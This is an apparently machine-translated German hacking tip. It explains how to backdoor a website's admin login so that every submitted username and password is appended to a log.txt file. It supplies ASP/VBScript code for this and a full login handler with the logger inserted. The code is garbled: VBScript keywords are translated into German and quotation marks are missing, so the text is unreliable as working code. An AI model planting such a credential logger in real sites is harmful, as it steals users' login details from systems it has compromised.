Viele Hacker erhalten das Benutzeranmeldekennwort der Zielwebsite, indem sie den Hintergrundanmeldecode ändern, sodass das Kennwort nach der Eingabe in einer TXT-Datei gespeichert wird.
Der Code lautet wie folgt:
set fso=server.createobject(scripting.filesystemobject)
Wenn fso.FileExists(server.mappath(log.txt))=true, dann
set fin=fso.OpenTextFile(server.mappath(log.txt))
temp=fin.readall
fin.close
setze fin=nichts
Ende wenn
set fout=fso.createtextfile(server.mappath(log.txt))
fout.WriteLine(temp&user:&username&¦pwd:&password&¦time:&now()&)
fout.close
setze fout=nichts
setze fso=nichts
Fügen Sie es dort ein, wo das Formular beim Hintergrund-Login übermittelt wird!
Referenzdokumente:
Kopieren Sie den Codecode wie folgt:
<%@sprache=vbscript codepage=936 %>
<%
dimsql,rs
dimmen Sie Benutzername, Passwort, CheckCode
username=replace(trim(request(username)),',)
passwort=replace(trim(Request(password)),',)
CheckCode=replace(trim(Request(CheckCode)),',)
wenn UserName= dann
FoundErr=True
ErrMsg=ErrMsg & <br><li>Benutzername darf nicht leer sein! </li>
Ende wenn
wenn Passwort= dann
FoundErr=True
ErrMsg=ErrMsg & <br><li>Passwort darf nicht leer sein! </li>
Ende wenn
wenn CheckCode= dann
FoundErr=True
ErrMsg=ErrMsg & <br><li>Der Bestätigungscode darf nicht leer sein! </li>
Ende wenn
if session(CheckCode)= dann
FoundErr=True
ErrMsg=ErrMsg & <br><li>Ihre Anmeldezeit ist zu lang. Bitte kehren Sie zur Anmeldeseite zurück, um sich erneut anzumelden. </li>
Ende wenn
if CheckCode<>CStr(session(CheckCode)) dann
FoundErr=True
ErrMsg=ErrMsg & <br><li>Der von Ihnen eingegebene Bestätigungscode stimmt nicht mit dem vom System generierten überein. Bitte geben Sie ihn erneut ein. </li>
Ende wenn
„Dahinter befindet sich der Code, den ich hinzugefügt habe – der Startbereich
set fso=server.createobject(scripting.filesystemobject)
Wenn fso.FileExists(server.mappath(log.txt))=true, dann
set fin=fso.OpenTextFile(server.mappath(log.txt))
temp=fin.readall
fin.close
setze fin=nichts
Ende wenn
set fout=fso.createtextfile(server.mappath(log.txt))
fout.WriteLine(temp&user:&username&|pwd:&password&|time:&now()&)
fout.close
setze fout=nichts
setze fso=nichts
'Der Code dahinter wurde von me~end area gelöscht
%>